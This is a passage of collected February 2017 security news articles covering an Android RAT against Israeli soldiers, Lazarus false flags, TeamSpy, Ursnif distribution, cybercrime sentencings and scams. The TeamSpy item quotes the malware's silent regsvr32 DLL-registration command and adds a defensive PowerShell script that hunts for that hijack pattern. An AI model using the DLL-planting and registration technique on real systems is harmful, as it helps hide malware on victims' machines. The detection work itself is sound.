In November last year, Google went public with information related to a 0-day vulnerability in Windows only 10 days after informing Microsoft on the matter, although a patch hadn’t been released yet. That disclosure too fell within the search giant’s policy, which gives vendors a 7-day deadline to resolve issues actively exploited by malicious actors.

A couple of years ago, Google made changes to its vulnerability disclosure policy after being criticized for enforcing it too strictly.


Android RAT Targeting Israeli Soldiers Part of Larger Campaign

20.2.2017 securityweek Android
An Android Remote Access Trojan (RAT) recently revealed to be targeting Israeli servicemen is part of a larger campaign that might not be associated with Hamas, as initially believed, security researchers have determined.

The attacks, which appear to have started around July 2016 and already hit more than 100 Israeli soldiers, were initiated through social networks and leveraged sophisticated lures to trick victims into installing malware on their Android devices. Focused on exfiltrating data from the compromised phones, the campaign is ongoing, with the most recent attacks observed in February.

Last month, an Israeli military official revealed that the attackers used ‘honey traps’ in the form of fake Facebook profiles featuring alluring photos of attractive young women, and that dozens of predominantly lower-ranked soldiers were duped into downloading fake apps on their phones. The official claimed that Hamas, the Islamist movement that runs the Gaza Strip, was behind the attacks, but didn’t say how the army came to the conclusion.

Now, Kaspersky security researchers, who worked with the Israeli army on investigating the incidents, reveal that the sophisticated attacks were initiated by a “cunning threat actor” and that Israeli Defense Force (IDF) servicemen of different ranks, most of them serving around the Gaza strip, were targeted. Lookout, which also analyzed the attacks, notes that Hamas doesn’t have a “sophisticated mobile capability,” suggesting that another faction is behind the campaign.

The attacks abused social networks such as Facebook to lure targeted servicemen (only IDF soldiers were targeted) into sharing confidential information and installing malicious apps, researchers say. The actors used avatars of young women pretending to be from different countries, including Canada, Germany, Switzerland and more, and attempted to lure victims using sexual innuendo.

Victims were tricked into manually downloading and installing a malicious application, which was designed to function as a dropper. After compromise, the dropper would fetch a list of installed applications and pretend to serve an update for one of them, depending on the findings: either a WhatsApp or Viber update, if one was found on the device, or a generic System Update, if nothing was discovered.

According to Lookout, which calls this Trojan ViperRAT, the actors used Trojanized versions of apps such as SR Chat and YeeCall Pro, as well as a billiards game, an Israeli Love Songs player, and a Move To iOS app, to disguise the dropper. Kaspersky, on the other hand, discovered the malware hidden in apps such as a YouTube player (LoveSongs) or messaging software (WowoMessanger, YeeCall).

“Naming additional payload applications as system updates is a clever technique used by malware authors to trick victims into believing a threat isn’t present on their device. ViperRAT takes this one step further by using its dropper app to identify an appropriate second stage ‘update’ that may go unnoticed,” Lookout points out.

The most important part of the attack, however, is the second-stage payload, which includes the surveillanceware capabilities. The malware can collect data from the compromised devices either by executing manual commands from the operator or by performing scheduled tasks (using various Android APIs, the malware collects specific information every 30 seconds).

The exfiltrated data included: contact information, compressed recorded audio, images captured from the device camera, images stored on the device, geolocation information, SMS content, call logs, cell tower information, browser search history and bookmarks, and general information such as network and device metadata (IMEI, operator, device model, SIM information, hardware details, SDK, and the like).

“The actors behind ViperRAT seem to be particularly interested in image data. We were able to identify that 8,929 files had been exfiltrated from compromised devices and that the overwhelming majority of these, 97 percent, were highly likely encrypted images taken using the device camera. We also observed automatically generated files on the C2, indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office documents,” Lookout notes.

According to Kaspersky, because the RAT doesn’t yet have root permissions implemented, it can’t access the WhatsApp database along with the encryption key. The security researchers also note that the malware can update itself and that all of the malicious logic associated with the Trojan was implemented without any native or third-party sources. For example, the call recording is implemented using Android’s API exclusively.

Although media reports have attributed these attacks to Hamas, Lookout believes that another actor is behind them, mainly because Hamas “is not widely known for having a sophisticated mobile capability.” Furthermore, the security firm notes that ViperRAT, which first surfaced in late 2015, features many default strings in Arabic, either because it was targeting Arabic speakers or because its developer is fluent in Arabic.

At the same time, Kaspersky suggests that the attacks observed so far are only the tip of the iceberg, and that the campaign is likely to continue. “The IDF, which led the research along with Kaspersky Lab researchers, has concluded that this is only the opening shot of this operation. Further, that it is by definition a targeted attack against the Israeli Defense Force, aiming to exfiltrate data on how ground forces are spread, which tactics and equipment the IDF is using and real-time intelligence gathering,” Kaspersky concludes.


Russian Words Used as Decoy in Lazarus-Linked Bank Attacks

20.2.2017 securityweek Attack

A group of hackers that has been targeting financial organizations around the world has unsuccessfully attempted to trick researchers into attributing their operation to Russian-speaking attackers.

Earlier this month, experts reported that the systems of several banks in Poland had been infected with a new piece of malware. Research conducted by Symantec and BAE Systems revealed that the attacks had been part of a bigger campaign that targeted financial and other organizations across 31 countries since at least October 2016.

The malware used in the attacks has been linked to a threat actor tracked as the “Lazarus Group,” which has been active since 2009 or earlier. The actor has targeted government, military, media, aerospace, financial and manufacturing organizations primarily in South Korea and the United States in both espionage and destructive campaigns.

The list of high-profile attacks attributed to the group includes the 2014 attack on Sony, which some believe was carried out by North Korea. Links have also been found between Lazarus and the theft of $81 million from Bangladesh’s Central Bank.

Security experts have often cautioned that attribution is difficult, especially since attackers can conduct so-called false flag operations, which aim to deceive observers. In the recent bank attacks linked to Lazarus, the actor apparently attempted to deceive researchers and make them believe that the malware was developed by Russian speakers.

Experts at BAE Systems have analyzed half a dozen malware samples and identified several Russian words, including for command and control (C&C) communications. However, a closer analysis revealed that the commands were likely the result of an online translation and they would be difficult to understand for a native Russian speaker.

For example, some words are written as they are pronounced (as shown by online translation services), not how they are actually written using Latin script.

“Through reverse-engineering, we can see the use of many Russian words that have been translated incorrectly. In some cases the inaccurate translations have transformed the meaning of the words entirely. This strongly implies that the authors of this attack are not native Russian speakers and, as such, the use of Russian words appears to be a 'false flag',” BAE Systems researchers said in a blog post.

“Clearly the group behind these attacks are evolving their modus operandi in terms of capabilities – but also it seems they’re attempting to mislead investigators who might jump to conclusions in terms of attribution,” they added.


Former Sysadmin Sentenced to Prison for Hacking Industrial Facility

20.2.2017 securityweek Hacking
A man has been sentenced to 34 months in prison and three years of supervised release for hacking into the systems of pulp and paper company Georgia-Pacific, the Department of Justice announced on Friday.

Based in Atlanta, Georgia-Pacific is one of the world’s largest manufacturers and distributors of paper products. The company has more than 200 facilities worldwide and it employs roughly 35,000 people.

Brian P. Johnson, age 44, had worked at the company’s paper mill in Port Hudson, Louisiana, as an IT specialist and system administrator until February 14, 2014, when he was terminated and escorted from the facility.

Johnson then remotely accessed the facility’s computers and caused system failures over the course of several days. When the FBI searched the man’s home in late February 2014, agents noticed a VPN connection to Georgia-Pacific’s systems on his computer.

The damage caused by the disgruntled employee has been estimated at more than $1.1 million, which Johnson will have to pay in restitution to Georgia-Pacific. He has also been ordered to pay $100 to the government and forfeit the devices used to commit the crime.

The former sysadmin was indicted in June 2015 and he pleaded guilty to intentionally damaging a protected computer in February 2016. He will begin serving his prison term next month.

Last year, the U.S. Attorney’s Office for the Middle District of Louisiana launched a new cybersecurity initiative which handles such threats, including attacks on critical infrastructure. The initiative is a result of partnerships with several federal, state and local law enforcement agencies.


Bug Allowed Theft of Over $400,000 in Zcoins

20.2.2017 securityweek Vulnerability
An implementation bug has allowed someone to make a profit of more than $400,000 after creating roughly 370,000 units of the Zcoin cryptocurrency, users were told on Friday.

Zcoin (XZC), worth approximately $2 per unit, is an implementation of the Zerocoin protocol, which aims to provide fully anonymous currency transactions. Zerocoin has also been used to create a new protocol called Zerocash and the ZCash digital currency.

A typo in the code allowed an attacker to fraudulently obtain Zcoins. They managed to create roughly 370,000 coins and sold most of them for a profit of approximately 410 bitcoins ($435,000).

Zcoin representatives pointed out that the exploit was possible due to a bug in the code and not a cryptographic weakness, and that the anonymity provided by Zerocoin has not been compromised. Zcoin said the damage was “mostly absorbed by the markets.”

“From what we can see, the attacker (or attackers) is very sophisticated and from our investigations, he (or she) did many things to camouflage his tracks through the generation of lots of exchange accounts and carefully spread out deposits and withdrawals over several weeks,” said Zcoin’s Reuben Yap.

Ian Miers, one of the founders of ZCash, has provided a likely explanation for what went wrong. Miers believes it was probably a bug that resulted from copying and pasting code.

The bug was addressed over the weekend and pools and exchanges have been instructed to update their code. Zcoin said no coins will be forfeited or blacklisted, despite the severity of the hack.

Incidents involving cryptocurrencies are not uncommon. In June 2016, the value of the Ethereum digital currency plummeted after someone exploited a vulnerability in the DAO.


TeamSpy malware is back, it transforms TeamViewer into a spying software
20.2.2017 securityaffairs Virus

Security experts from Heimdal Security discovered a new spam campaign over the weekend leveraging the TeamSpy malware to spy on victims.
Security experts from Heimdal Security have uncovered a new spam campaign that emerged over the weekend. The crooks used the notorious TeamSpy malware to gain full access to the target computers.

We have not heard about the TeamSpy malware for a long time; it made the headlines in 2013, when security researchers at the Hungary-based CrySyS Lab discovered a decade-long cyber espionage campaign that targeted high-level political and industrial entities in Eastern Europe.

The attackers, dubbed by security researchers TeamSpy, used the popular remote-access program TeamViewer and a specially crafted malware to steal secret documents and encryption keys from victims.

Back to the present, the latest wave of attacks relied on social engineering to trick victims into installing the TeamSpy malware.

Malware authors used DLL hijacking to execute unauthorized actions through legitimate software.

The attack chain starts with a spam email carrying a .zip attachment such as:

Fax_02755665224.zip -> Fax_02755665224.EXE

When the victim opens the zip archive and runs the accompanying .exe file, the TeamSpy malware is dropped onto the victim’s computer as a malicious DLL:

%APPDATA%\SysplanNT\MSIMG32.dll. That library is then registered via C:\Windows\system32\regsvr32.exe /s %APPDATA%\SysplanNT\MSIMG32.dll

According to the researchers, the TeamSpy malware adds various components to the otherwise legitimate TeamViewer application, two of them being a keylogger and a TeamViewer VPN.
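The hijack pattern described above (a DLL named like a Windows system library dropped under %APPDATA% and registered with regsvr32 /s) can be hunted for on a single host. The following PowerShell is an added example, not code from the Heimdal Security analysis; it assumes an elevated PowerShell 5.1+ session and, for the second check, that process-creation auditing (Security event 4688) with command-line logging is enabled on the host.

```powershell
# Added example (not from the Heimdal analysis): hunt for a system-named DLL
# planted under the user profile and for regsvr32 registering anything from there.
# Assumes: elevated session; event 4688 command-line auditing enabled for check 2.

# Build the set of DLL names that legitimately live in System32. The same
# file name under a user-writable path (TeamSpy: %APPDATA%\SysplanNT\MSIMG32.dll)
# is a classic DLL search-order hijack indicator.
$systemDlls = @{}
Get-ChildItem -Path "$env:SystemRoot\System32" -Filter '*.dll' -File |
    ForEach-Object { $systemDlls[$_.Name.ToLowerInvariant()] = $true }

function Find-ShadowedSystemDlls {
    param([string]$Root = $env:APPDATA)
    Get-ChildItem -Path $Root -Recurse -Filter '*.dll' -File -ErrorAction SilentlyContinue |
        Where-Object { $systemDlls.ContainsKey($_.Name.ToLowerInvariant()) } |
        ForEach-Object {
            # A genuine system DLL is Microsoft-signed; a planted copy usually is not.
            $sig    = Get-AuthenticodeSignature -FilePath $_.FullName
            $signer = ''
            if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
            [PSCustomObject]@{
                Path      = $_.FullName
                SHA256    = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
                SigStatus = $sig.Status
                Signer    = $signer
                LastWrite = $_.LastWriteTime
            }
        }
}

function Find-RegsvrFromProfile {
    param([int]$Days = 7)
    # regsvr32 /s silently calls the DLL's DllRegisterServer export, which is how
    # the dropped library gets its code running. Look for regsvr32 launched
    # against anything under a user profile path in recent process-creation events.
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Pull named EventData fields; CommandLine is only populated when
            # "Include command line in process creation events" is enabled.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [PSCustomObject]@{
                Time        = $_.TimeCreated
                Image       = $data['NewProcessName']
                CommandLine = $data['CommandLine']
                ParentImage = $data['ParentProcessName']
            }
        } |
        Where-Object {
            $_.Image -match '(?i)\\regsvr32\.exe$' -and
            $_.CommandLine -match '(?i)\\AppData\\|%APPDATA%'
        }
}

Write-Host '== System-named DLLs found under the user profile =='
Find-ShadowedSystemDlls | Format-Table -AutoSize

Write-Host '== regsvr32 executions referencing a profile path (last 7 days) =='
Find-RegsvrFromProfile | Format-Table -AutoSize
```

Any hit from the first check is worth triaging by hash and signature before deletion, since a few legitimate installers also ship private copies of system-named DLLs; a hit from the second check that pairs with one from the first is the pattern the Heimdal report describes.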

The attacks discovered by Heimdal Security are very insidious because victims will not be able to detect them.

“Given how the TeamSpy infection happens, it is clear that a TeamViewer session started by the attackers will be invisible to the victim. This can lead to numerous forms of abuse against the services that the logged in user runs on his/her computer.” states the analysis shared by Heimdal Security.

“This attack can also circumvent two-factor authentication and can also give cybercriminals access to encrypted content which is unencrypted by the users on their compromised computers.”

At the time of writing, most antivirus software was not able to detect this variant of the TeamSpy malware; it had a detection rate of 15/58 on VirusTotal.


As usual, let me suggest that you avoid opening unwanted emails and that you don’t open email attachments from unknown senders.

“We highly recommend that you carefully analyze unwanted emails that you receive and that you don’t download email attachments from unknown senders. Malware can disguise itself in many forms on the web, and all it takes is one click to trigger an infection.” concluded the analysis.


Love for 19,000 crowns. Police warn of scams on dating sites

20.2.2017 Novinky/Bezpečnost Hacking
People looking for love on the internet should be on their guard. A recent case shows why: a woman sent 750 US dollars (roughly 19,000 CZK) to a man in the USA who claimed to be a widower. The money was supposed to pay for shipping his luggage from his military mission. But once the woman sent the funds, he stopped communicating.
According to the police, these are not isolated cases. People should be cautious when communicating on the internet, said police spokeswoman Marie Šafářová. In the Olomouc region, for example, a special department for fighting internet crime was set up some time ago.

Detectives have been investigating the latest case since last week; the man lured his victim into making a payment to a foreign bank account. “He posed as a widower from America, an architect with a nine-year-old daughter. He also told the woman that he was currently serving as a soldier in Afghanistan and that the mission was just ending. They agreed to meet in the Czech Republic, with him first sending his luggage,” the spokeswoman said.

According to detectives, other women on dating portals may be contacted in the same or a similar way. Police therefore urge people to be especially careful and vigilant, not only on social networks but elsewhere on the internet as well. They point out that the anonymity of the internet makes it easy for perpetrators to find potential victims.

Other threats lurk on the internet
It is nonetheless important to point out that fraudsters after cash are not the only danger lurking on the internet. There are far more pitfalls, and some of them are far more serious, as shown by the film trilogy Seznam se bezpečně!, produced by the company Seznam.cz.

The first two parts were based on real stories. One of them, for example, featured 14-year-old David, who befriended an unknown adult man online. The man offered him a two-thousand-crown bribe for sending photos and a video of his naked body. Also captured is an interview with the pedophile Miroslav and with 16-year-old Patrik, who made a living as a child prostitute.

The third part deals with the case of scout leaders from Ústí nad Labem, who blackmailed children on the internet with intimate pictures and sexually abused some forty of them.

One of the central figures of the film is the convicted scout leader Martin Mertl, who described on camera how the attacks took place. He had earlier told Novinky exclusively that he was the main perpetrator in the whole case.

The whole Seznam se bezpečně! trilogy can be watched at www.seznamsebezpecne.cz.

According to police statistics, the number of crimes committed via the internet has fallen: last year there were 286 cases, the year before 405. Combating cybercrime remains one of the police leadership’s priorities this year, deputy regional police director Radovan Vojta said at the end of January.


Ukrainian Cybercriminal who sent Brian Krebs heroin sentenced to prison in US
20.2.2017 securityaffairs Crime

The Ukrainian Cybercriminal who tried to get revenge on Brian Krebs for exposing him was sentenced to 41 months in prison in the US.
The Ukrainian cybercriminal Sergey Vovnenko (31, aka “Sergey Vovnencko,” “Tomas Rimkis,” “Flycracker,” “Flyck,” “Fly,” “Centurion,” “MUXACC1,” “Stranier” and “Darklife”), who attempted to get revenge on the well-known cyber security investigator Brian Krebs for exposing him, has been sentenced to prison in the US.

The man was arrested in Italy in June 2014, where he remained 15 months before being extradited to the United States in January 2016.

The US court sentenced Vovnenko to 41 months in jail and three years of supervised release; the authorities also ordered him to pay more than $83,000 in restitution.

Vovnenko was the administrator on two cybercrime forums, he admitted stealing login credentials and payment card data as part of an international hacking conspiracy, and pleaded guilty to wire fraud conspiracy and aggravated identity theft.

“From September 2010 through August 2012, Vovnenko and his conspirators operated an international criminal organization that hacked into the computers of individual users and companies located in the United States and elsewhere.” reads the DoJ. “They used that access to steal user names and passwords for bank accounts and other online services, as well as debit and credit card numbers and related personal identifying information.”

Alongside his accomplices, he infected more than 13,000 computers with the Zeus banking Trojan to steal banking data.

Why Brian Krebs?

Krebs started investigating Vovnenko in 2013 and was able to uncover the criminal’s real identity. To get revenge, Vovnenko requested donations from other criminals to purchase heroin from Silk Road and have it sent to Krebs, so that he would be arrested for drug possession.

Unfortunately for the Ukrainian cybercriminal, Brian Krebs had infiltrated his criminal forum and was able to alert law enforcement before the drugs were shipped to his address.

“Fly’s plan was simple: Have the drugs delivered to my home in my name, and then spoof a call from one of my neighbors to the local police informing them that I was a druggie, that I had druggie friends coming in and out of my house all day long, and that I was even having drugs delivered to my home.” wrote Krebs.

“The forum members took care to find the most reputable sellers of heroin on the Silk Road. After purchasing a gram of the stuff from the Silk Road’s top smack seller — a drug dealer who used the nickname “Maestro” — Fly posted the USPS tracking link for the package into the discussion thread on his forum.”

Krebs looks forward to meeting the Ukrainian cybercriminal in person one day, as he explained in his post.

“Cybercrooks have done some pretty crazy stuff to me in response to my reporting about them. But I don’t normally get this kind of closure. I look forward to meeting with Fly in person one day soon now that he will be just a short train ride away. And he may be here for some time: If convicted on all charges, Fly faces up to 30 years in U.S. federal prison.” concludes Krebs.

If you are interested in the story, the Justice Department’s press release on Vovnenko’s indictment is here and the actual indictment can be found at this link.


Ukrainian Cybercriminal Sentenced to Prison in U.S.

20.2.2017 securityweek Crime

Hacker Who Tried to Get Revenge on Brian Krebs for Exposing Him Sentenced to Prison

The Ukrainian cybercriminal who attempted to get revenge on security blogger Brian Krebs for exposing him has been sentenced by a U.S. court to 41 months in prison and three years of supervised release, and ordered to pay more than $83,000 in restitution.

Sergey Vovnenko, aged 31, was also known as “Sergey Vovnencko,” “Tomas Rimkis,” “Flycracker,” “Flyck,” “Fly,” “Centurion,” “MUXACC1,” “Stranier” and “Darklife.” He was arrested in Italy in June 2014, where he spent the next 15 months trying to fight his extradition to the United States.

In January 2016, after being extradited to the U.S., Vovnenko admitted stealing login credentials and payment card data as part of an international hacking conspiracy, and pleaded guilty to wire fraud conspiracy and aggravated identity theft.

According to authorities, Vovnenko was an administrator on two cybercrime forums. Between September 2010 and August 2012, he and his co-conspirators infected at least 13,000 computers with the Zeus banking Trojan in order to steal valuable information.

Investigative journalist Brian Krebs started monitoring Vovnenko in 2013, and he soon managed to find his real identity. In an effort to get revenge on Krebs, the Ukrainian had requested donations from other fraudsters to purchase heroin from Silk Road and have it delivered to the blogger.

The plan was to spoof a call from one of Krebs’ neighbors to local police and get him arrested for drug possession. However, the journalist had infiltrated Vovnenko’s forum and alerted the police before the drugs arrived.

Krebs believes the hacker’s “antics” likely contributed to his arrest and guilty plea. The blogger said Vovnenko apparently turned his life around while in prison in Italy.

Vovnenko is not the only hacker who targeted Krebs and was sentenced last week. Eric Taylor, known online as UG Nazi member “Cosmo the God,” has been sentenced to three years of probation for running Exposed.su, a website that leaked private information on several high-profile individuals.

Krebs was swatted by Taylor and others following his coverage of Exposed.su. Another member of the conspiracy, Mir Islam, was sentenced in June 2016 to two years in prison.


Here is the distribution network behind the Ursnif banking Trojan
20.2.2017 securityaffairs Virus

The security experts at Palo Alto Networks published a detailed analysis of the architecture used to spread the Ursnif banking Trojan worldwide.
Malware researchers from Palo Alto Networks are monitoring the diffusion of the Ursnif banking Trojan worldwide and have identified the architecture used to spread it.

The Ursnif Trojan is spread via spam emails that contain malicious attachments used to download and execute the malware. In this attack scenario, the researchers focused their investigation on the spam botnet used to send the malicious emails and on the network of compromised web servers used to host the malicious code.

Below are the key findings on the distribution infrastructure:

The spam botnet focuses on delivering banking Trojans or downloader Trojans to Japan, Italy, Spain, Poland, Australia, and Germany.
Compromised web servers host banking Trojans and spam bot files that are downloaded by the malicious downloader program distributed via spam.
The experts discovered that the crooks copied their malicious files onto multiple servers, making their infrastructure redundant; more than 200 such files were found on 74 different servers used between April 2015 and January 2017. Most were compromised personal or small-to-medium-sized business websites in Europe that had not been maintained for years.

The researchers discovered that in 2016 the attackers mostly targeted Japanese users with the Shiotob (a.k.a. Bebloh or URLZone) malware. The researchers detected 75 unique variants in 7 million spam emails. The malware was used to steal banking credentials and to download a secondary payload, including the Ursnif banking Trojan.

“Using our threat intelligence platform AutoFocus, Palo Alto Networks observed millions of e-mails sent to Japanese targets throughout 2016. Most of the emails were written in Japanese (see example in Figure 1). The latest attachment we’ve seen, detected in January 2017, is a JavaScript downloader that simply downloads Ursnif from a remote site and executes it on compromised machine.” reads the analysis published by Palo Alto Networks.

An analysis of 200 unique Japanese IP addresses that were spamming Shiotob revealed 250 unique malware samples being sent among 268,000 emails.

It is interesting to note that the threat actors behind the spam campaigns were also able to tailor their attacks to the specific country.

The Ursnif banking Trojan and Shiotob were delivered in Australia; KINS and Ursnif in Italy; Shiotob and Ursnif in Japan; Ursnif and Tinba in Spain and Poland; and Ursnif and KINS in Germany.

[The following graph is] “the breakdown of malware found on the web servers and where the malware downloaded from based on our telemetry (Table 2). The results correspond to the analysis of targets and malware by SPAM in the previous section.”


The one element that is still unclear is the threat actor behind the campaign: is it a single group or several gangs sharing the same infrastructure?


Who attacked the OSCE servers? The attacker is still at large

20.2.2017 Novinky/Bezpečnost BigBrother
The Organization for Security and Co-operation in Europe (OSCE) is unable to identify who was behind last year’s hacker attacks against the institution’s servers, OSCE Secretary General Lamberto Zannier said on the sidelines of the Munich international security conference. The head of German counterintelligence, Hans-Georg Maassen, stated in January that Russia was apparently behind the hacker attack.
“We saw traces of the attack. We know that someone got into the system, the e-mail system. From what we found, we cannot trace where the attack came from,” Zannier told the TASS agency. “We are introducing better protection, but from what we know, we cannot point a finger in any direction,” he added.

The public was informed about the hacker attack on the OSCE at the end of December. According to earlier information from the DPA agency, it was uncovered by the German Federal Office for the Protection of the Constitution, which serves as the civilian counterintelligence agency. One of the OSCE’s most important operations at present is its mission in eastern Ukraine, where the armed conflict between Ukrainian government forces and pro-Russian separatists is now in its third year.

The administration of former US President Barack Obama also accused Russia of hacker attacks. According to it, hackers acting on the Kremlin’s orders penetrated the Democratic Party’s e-mail in order to influence the presidential election. Moscow rejected all the accusations.


A group of Iraqi hackers called Pro_Mast3r defaced a Trump website
20.2.2017 securityaffairs Hacking

The group of Iraqi hackers called “Pro_Mast3r” has breached the server hosting a Trump website associated with campaign donations.
A group of hackers calling themselves “Pro_Mast3r” defaced a website associated with President Donald Trump’s presidential campaign fundraising on Sunday.

The website was hosted on the server secure2.donaldjtrump.com that is managed by the Cloudflare content management and security platform.

The website is not directly linked from the Trump-Pence campaign’s home page. According to the Ars website, the hacked machine is an actual Trump campaign server that uses a legitimate certificate.

“But it does appear to be an actual Trump campaign server—its certificate is legitimate, but a reference to an image on another site is insecure, prompting a warning on Chrome and Firefox that the connection is not secure.” states Ars.

The defaced page displayed an image of a man in a fedora and the following text:


The analysis of the page’s source code revealed a link to a JavaScript file on a now-nonexistent Google Code account, ‘masterendi’. This account was associated with the hack of other websites.

The script is a snow animation script, it doesn’t include any malicious component.

The strange circumstance in this hack is that the attackers included JavaScript that was no longer available online.

Archive.org holds several snapshots of this specific JavaScript link, but none have been active since 2015.


At the time of writing, the server was down.

Let’s wait for a reply from both Cloudflare and the Trump-Pence campaign team.


Fraudulent SMS messages keep scaring people. They cost recipients money

19.2.2017 Novinky/Bezpečnost Mobilní
Fraudulent SMS messages in which hackers pose as employees of the shipping company DHL are still circulating in the Czech Republic. Users should be very wary of them, because through them a malicious virus can get into a smartphone. And that then usually costs the recipient of the dangerous SMS message money.
The fraudulent SMS messages began spreading across the Czech Republic last week, as Novinky.cz already reported.

Security experts have nonetheless warned about them again, because the hackers are not letting up in sending them. Rather the opposite.

The attackers keep changing the wording of the fraudulent messages, but their meaning is usually the same: they try to intimidate the recipient. “Dear DHL customer, your shipment cannot be delivered because of an illegible address. To change the address, use our DHL Express Online application,” the message reads.

The SMS itself also contains a link to download the mentioned application. And that is precisely the main stumbling block. If users download the application, they also install a Trojan horse, which later slips in a fake login page when internet banking is opened. Users thus hand hackers access to their account on a silver platter.

They can take out a loan
And since the perpetrators already have access to the mobile phone as well, where confirmation SMS messages for completed transactions usually arrive, nothing stops them from emptying the account.

It is also worth remembering that cybercriminals can easily deprive users even of money they do not actually have in their account. Every other bank today offers loans arranged online. That is another way the attackers can get hold of cash.

DHL had already distanced itself from the fraudulent SMS messages earlier. “We have now managed to invalidate the links to the incriminated websites, which the organizers set up in Panama. We remain in intensive contact with mobile operators so that they filter such SMS messages and try to identify the source of the sent SMS,” company representatives said.

It is nonetheless very likely that the fraudsters, as in other attacks, will set up other websites that will again pose a risk to users. “Under no circumstances open the pages the SMS links to!” the company’s statement says.

The current threat concerns exclusively devices running the Android operating system. However, it cannot be ruled out that cybercriminals will try to get into devices built on other platforms in the same way.

They attack smartphones regularly
Hackers have been focusing on smartphones more and more often in recent months. Users very often underestimate security on these devices.

To limit the risks, owners should equip their smartphone with an antivirus program, just like a desktop computer, and should regularly download all important updates for installed applications and for the operating system itself.


The Russian propaganda is scaring European Intelligence and NATO
19.2.2017 securityaffairs Cyber

Top NATO General Petr Pavel confirmed that Russian propaganda was behind a false report of a rape by German soldiers in Lithuania.
Psychological Operations are not a novelty in the military and Russia demonstrated a great ability in the adoption of such techniques.

Top NATO General Petr Pavel confirmed on Saturday that Russia was behind a false report of a rape by German soldiers in Lithuania; the operation aimed to undermine support for NATO’s new eastern force.

The senior NATO general is warning Europe to expect more operations aimed at spreading “fake news”.

According to Pavel, an email claiming that German-speaking men had raped a 15-year-old girl in Lithuania last week was sent to the speaker of Lithuania’s parliament.

“It is clearly fake news and I believe we should expect more of this,” Pavel, told Reuters.

Moscow doesn’t accept the presence of NATO troops closer to its border; for this reason, its military started a propaganda campaign to turn the sentiment of the local population against the soldiers of the Alliance.

The Russian propaganda machine is considered very effective and almost every government fears its activities.

Estonia’s Foreign Minister Sven Mikser also said he expected more “hostile propaganda” over the troop presence.

“It will likely use legal means, such as propaganda and they will try to influence public opinion against the deployments,” he said. “It will get stronger … but we will be transparent, consistent.”

European intelligence agencies believe that Russia will launch cyber attacks against foreign countries in order to destabilize their governments.

In January, Defense Minister Le Drian expressed concerns about cyber attacks against defense systems and warned of hacking campaigns targeting the upcoming elections.

In February, the Dutch Government announced that all ballots in the election next month will be counted by hand in order to avoid any interference due to cyber attacks.

“Reports in recent days about vulnerabilities in our systems raise the question of whether the results could be manipulated,” explained Interior Minister Ronald Plasterk in a statement on Wednesday. “No shadow of doubt can be permitted.”

The Minister fears cyber attacks from foreign states, including Russia that is one of the most dreaded threats.

“Now there are indications that Russians could be interested, for the following elections we must fall back on good old pen and paper,” he added.

The German Government also fears possible interference by Russian hackers; for this reason the Chancellor would like to start an intense dialogue with Moscow.

“German Chancellor Angela Merkel said on Saturday she would like to discuss the issue with Russia, but it was questionable whether the problem could be successfully addressed before European elections this year.” reported Reuters.

Back to the present, Pavel confirmed that contacts between NATO’s top commanders and their Russian counterparts could resume in the next few weeks; he did not exclude a face-to-face meeting.


New York state cyber security rules will be effective on March 1st
19.2.2017 securityaffairs Cyber

New York state announced a set of cyber security regulations that will take effect on March 1st to tackle cyber threats.
On Thursday, New York state announced that a cyber security regulation will take effect on March 1st. The regulations will require financial institutions and insurers to meet minimum cyber security standards and report cyber incidents to regulators.

The organizations subject to the new cyber security rules include both state-chartered banks and foreign banks operating in the New York state, along with any insurer that works in the state.

The measures are necessary to mitigate the risk of exposure to cybercrime organizations and other threat actors.

The cyber security regulation announced by New York state lays out unprecedented requirements on the cyber security posture organizations must adopt to protect their infrastructure from cyber attacks.

The regulations are the result of a huge effort that started in 2014. New York state delayed implementation of the cyber security regulation by two months and loosened some requirements after financial organizations demanded an extension because of the overhead of ensuring compliance.

“The rules, in the works since 2014, followed a series of high-profile data breaches that resulted in losses of hundreds of millions of dollars to U.S. companies, including Target Corp, Home Depot Inc, and Anthem Inc.” reported Reuters.

The importance of the regulations was highlighted by the Governor Andrew Cuomo in the statement:

“These strong, first-in-the-nation protections will help ensure this industry has the necessary safeguards in place” to protect businesses and clients “from the serious economic harm caused by these devastating cyber-crimes,”


Financial institutions and insurers will have to scrutinize the security posture of third-party service providers and conduct a continual risk assessment process.

“The revised rule requires firms to perform risk assessments in order to design a program particular to them, and gives them at least a year-and-a-half to comply with the requirements. The final rule took into account the burden on smaller companies, a spokeswoman for the agency said.” continues Reuters.

The good news is that attention to cyber security is widespread in the US: a task force of U.S. state insurance regulators is already working on a model cyber security law that could be adopted by various states.


RSA Conference 2017 attendees hacked with rogue access points
19.2.2017 securityaffairs Congress

Experts at Pwnie Express discovered multiple rogue access points on the show floor that were used to hack the RSA conference attendees.
The news is very curious: the attendees at the 2017 RSA conference, one of the world’s largest security events, may have been hacked.

Security researchers at Pwnie Express were scanning the conference floor when they discovered rogue access points (an EvilAP attack) posing as known and trusted networks.

“Security testing vendor Pwnie Express has been passively scanning the airwaves on the RSA Conference show floor and has found multiple instances of EvilAP attacks.” reads a blog post published by EsecurityPlanet.com. “In an EvilAP attack, a rogue access point uses a Karma attack to trick users into thinking they are connecting to a known access point. Among the access point beacons sent out in the EvilAP attacks at the RSA Conference are common locations like Starbucks and McDonald’s.”

The pen testers at Pwnie Express confirmed that multiple users connected to a rogue access point and at least two remained connected over the course of more than a day.


According to Pwnie Express, there were multiple Wi-Fi access points running on the RSA Conference show floor that used WEP encryption … and as you know, WEP networks are quite simple to break.

The experts at Pwnie Express highlight the risks of connecting to a rogue access point: an attacker can set one up to gain “full control of all information going into and out of the device.”

A rogue access point could also be used to deliver malicious code on the user device and launch man-in-the-middle (MITM) attacks.


An unsecured router as a weapon for cybercriminals

19.2.2017 SecurityWorld Zabezpečení
What are users of an inadequately secured router exposed to, and how can they effectively defend against its abuse?

Routers have attracted the attention of cyberattackers since time immemorial. For many people they are the basic access point to the internet, yet only a fraction of users deal with securing them properly.

A router, which from the intruder’s point of view sits in an ideal position between the end devices and the internet, allows all connected devices within its reach to be attacked. An attack can thus have far more devastating consequences than one on the computers themselves, whose security people do not underestimate: every user has at least a minimal awareness of the risks of malware and of the ways to defend against it.

